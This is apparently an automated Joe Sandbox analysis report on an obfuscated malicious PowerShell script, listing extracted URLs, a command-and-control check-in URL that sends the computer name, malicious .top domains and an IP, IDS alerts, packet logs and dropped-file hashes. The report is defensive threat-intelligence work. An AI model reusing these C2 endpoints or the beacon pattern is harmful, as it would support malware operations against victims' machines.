                                                        https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1002083018.0000019C3AED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BA55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1002083018.0000019C3AC49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.ver)svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://apis.google.comXzfpowershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                              		high
                                                                              http://crl.ppowershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://canjjclmlnicbga.toppowershell.exe, 00000000.00000002.978672288.0000019C2B7A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1002083018.0000019C3AE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlXzfpowershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.978672288.0000019C2BA6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.quovadis.bm0powershell.exe, 00000000.00000002.978107895.0000019C2A682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188514912.000002805AF02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2188353414.000002805AE99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.978672288.0000019C2BE5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.978672288.0000019C2ABD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://$kslt27cb1amnzqo/$wtdlhyxu19ai8vf.php?id=$env:computername&key=$rpsakvbwizxdmj&s=527powershell.exe, 00000000.00000002.978672288.0000019C2ADA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  45.61.136.138
                                                                                                  		canjjclmlnicbga.topUnited States
                                                                                                  		40676AS40676UStrue
                                                                                                  172.217.1.100
                                                                                                  		www.google.comUnited States
                                                                                                  		15169GOOGLEUSfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1586073
                                                                                                  Start date and time:2025-01-08 17:30:47 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 8m 4s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                  Run name:Suspected VM Detection
                                                                                                  Number of analysed new started processes analysed:15
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:download.ps1
                                                                                                  Detection:MAL
                                                                                                  Classification:mal64.evad.winPS1@3/11@2/3
                                                                                                  EGA Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 11
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .ps1

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.44.18.98, 204.79.197.237
                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8388 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: download.ps1

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  11:34:51API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                  11:35:17API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/hibqcrnlaehtr.php?id=user-PC&key=124983136495&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/x31t20p8dnhtr.php?id=computer&key=63331330340&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/3dy4fnsuzmhtr.php?id=computer&key=40391840945&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527

                                                                                                  Domains

                                                                                                  No context

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 206.201.59.150
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138

                                                                                                  JA3 Fingerprints

                                                                                                  No context

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310720
                                                                                                  Entropy (8bit):0.13581000965366563
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5Z:mJP74rzc8Myr43mNrf6YM5Z
                                                                                                  MD5:EFEA68A4F8CBC2CC5767AF186E2E4AF8
                                                                                                  SHA1:C2612E6436D3D36570880D95812F6B901DB9811F
                                                                                                  SHA-256:2AB1B409CB4BA207349EE1D9ACC1BCA6919DB9192241DB5B66C3BAE7403FA4A2
                                                                                                  SHA-512:A9017C441702828119C5327EB4C8C31ECCC24BDC8EA3DDD2261D4539A0B1D4FDF89FFCA8459E4C3A07A65C3ACE1141B0FB7015850F22CCE17E5E16E4A7643B34
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:...........@..@.3...{g..*...yo.........<.....).*9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd195d69c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1048576
                                                                                                  Entropy (8bit):0.869798908913075
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:TSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:TapaQK0yfOD8F31Xw
                                                                                                  MD5:D34277CD24CDBE22DE6C0538B3096DC3
                                                                                                  SHA1:05623E4402813A7A7CF4217966CC1647B838AFA6
                                                                                                  SHA-256:4606452574F8AA0D53C94B99C5C5D67918C32D23BD0AF3631603F3F47840BDE0
                                                                                                  SHA-512:45D5A1BE2CDE5C5CF4CB0DAD871FED10E957E1E1F672E3F84D2BAF293995D591A83B2FA9F4C1F8D901FDB088F8FC10B67E1B9A3D48B5DEB018A77E852AE1CAB2
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..... ................p..*9...y........................0..........|)..#...}A.h.2...........................).*9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g..........................................................................................................................................................................................................................................#...}a......................#...}a..........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.08227104821733174
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:2l//s58Bj4i4uRFE5/ll/fv79fyXallo0lJlbxvws:iBj3LRi5/ll/7pyeL
                                                                                                  MD5:E75DB3923303BA308905AFA95DD4F215
                                                                                                  SHA1:0625FA20860F43DF9760FEA95A1BC33C6662736E
                                                                                                  SHA-256:3CFE9DAE7AE3FCA646937D93C2FF98079AB1A7E3CBFB5BCCBF5FE639498D4257
                                                                                                  SHA-512:F27D11EF4F7CC90EE74B3B98CAD79A814A3B5DB8BD44998EEE61C8DB72AE663B74CEC43DF8B1BBBB7A40A7ED929DC61B332AA93C8AC71C0018C57FDF9ACAB2EB
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:>c.|....................................*9...y...#...}a......|)..............|)......|)..C.t.....|)O.....................#...}a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nxviph5.xp2.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jswumb2v.yd5.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqreaddj.x1r.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk203xku.44j.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7472258512967436
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JlDvBCHGVDkvhkvCCtjL8D9DzoAHpa8D9DzoAHp3:JlDLVjgD9Dk4PD9Dk43
                                                                                                  MD5:67A14B6584CDD09C7C74F044C5C002E6
                                                                                                  SHA1:03AAA116E9F8A68588396CD0426A43989EDDCEEF
                                                                                                  SHA-256:833F1AF2A3E8F48FDE5B94AD58731FB442C429D7AD7E001D4C66F605F4105120
                                                                                                  SHA-512:8F69D544FCA190461BB6EB50E1D33F07FF66FDEEDD718DC58C863C58DAD1A21029D82EA91C8193D188835E53CC1B6524F35B2CF3101C7FBB4D6206F9F93716F2
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...;.}.S.....<.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......6.a..a..<.a......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.(ZQ.....B......................A!.A.p.p.D.a.t.a...B.V.1.....(ZT...Roaming.@......"S.(ZT.....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.(ZQ.....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....(ZNT..Windows.@......"S.(ZNT....F......................l~.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`(Z5T....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`(Z5T....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.(Z4T....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.(ZY.....i...........

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PEDBTAX6M1Z9KM3EYXI1.temp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7472258512967436
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JlDvBCHGVDkvhkvCCtjL8D9DzoAHpa8D9DzoAHp3:JlDLVjgD9Dk4PD9Dk43
                                                                                                  MD5:67A14B6584CDD09C7C74F044C5C002E6
                                                                                                  SHA1:03AAA116E9F8A68588396CD0426A43989EDDCEEF
                                                                                                  SHA-256:833F1AF2A3E8F48FDE5B94AD58731FB442C429D7AD7E001D4C66F605F4105120
                                                                                                  SHA-512:8F69D544FCA190461BB6EB50E1D33F07FF66FDEEDD718DC58C863C58DAD1A21029D82EA91C8193D188835E53CC1B6524F35B2CF3101C7FBB4D6206F9F93716F2
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...;.}.S.....<.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......6.a..a..<.a......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.(ZQ.....B......................A!.A.p.p.D.a.t.a...B.V.1.....(ZT...Roaming.@......"S.(ZT.....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.(ZQ.....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....(ZNT..Windows.@......"S.(ZNT....F......................l~.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`(Z5T....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`(Z5T....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.(Z4T....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.(ZY.....i...........

                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55
                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                  Malicious:false
                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:ASCII text, with very long lines (11047), with CRLF line terminators
                                                                                                  Entropy (8bit):5.989658417406832
                                                                                                  TrID:
                                                                                                    File name:download.ps1
                                                                                                    File size:20'153 bytes
                                                                                                    MD5:c3069b0a32c08b0a370416307a30763b
                                                                                                    SHA1:4323b4456b90bb1607100358745ab749f8a39f71
                                                                                                    SHA256:ef449349ec7314b24d3144ebb71c04514eef6d6afb7932c6d5cf403ce22ea147
                                                                                                    SHA512:1909a67533b4e3a350cc74d3557f76a55742362bf69c30c42e64d6035599e76db33ff427068962d38821050953cf22cca4b42e2e3674e40b2d02bafc6540ea14
                                                                                                    SSDEEP:384:SmMHSm0XreHi4rjB74ZiBmwDNmCcFtTbt+JZoTB2h6zuwarmBGoR:SNEXMzrjBYJnPt+JZoAxd6BGoR
                                                                                                    TLSH:D6927DF2678AE8F1D2D5C51F2906FC28377138BF96DE5AC0FB49D9A1E3A12406E54C81
                                                                                                    File Content Preview:$eumwxfykrjqdci=$executioncontext;$ertionatenreonrealartionerorbeanoninesatis = -join (0..54 | ForEach-Object {[char]([int]"00000149000001480000015300000146000001520000015000000152000001510000015100000146000001520000014400000145000001510000014800000152000

                                                                                                    File Icon

                                                                                                    Icon Hash:3270d6baae77db44

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-08T17:34:55.057385+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.204970645.61.136.13880TCP
                                                                                                    2025-01-08T17:34:55.057385+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204970645.61.136.13880TCP
                                                                                                    2025-01-08T17:34:55.568587+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.2049707172.217.1.10080TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 8, 2025 17:34:54.563674927 CET4970680192.168.11.2045.61.136.138
                                                                                                    Jan 8, 2025 17:34:54.745462894 CET804970645.61.136.138192.168.11.20
                                                                                                    Jan 8, 2025 17:34:54.745634079 CET4970680192.168.11.2045.61.136.138
                                                                                                    Jan 8, 2025 17:34:54.748087883 CET4970680192.168.11.2045.61.136.138
                                                                                                    Jan 8, 2025 17:34:54.924849033 CET804970645.61.136.138192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.004087925 CET804970645.61.136.138192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.057384968 CET4970680192.168.11.2045.61.136.138
                                                                                                    Jan 8, 2025 17:34:55.126949072 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.245562077 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.245759010 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.245980978 CET4970780192.168.11.20172.217.1.100
                                                                                                    Jan 8, 2025 17:34:55.364546061 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568238020 CET8049707172.217.1.100192.168.11.20
                                                                                                    Jan 8, 2025 17:34:55.568356991 CET8049707172.217.1.100192.168.11.20
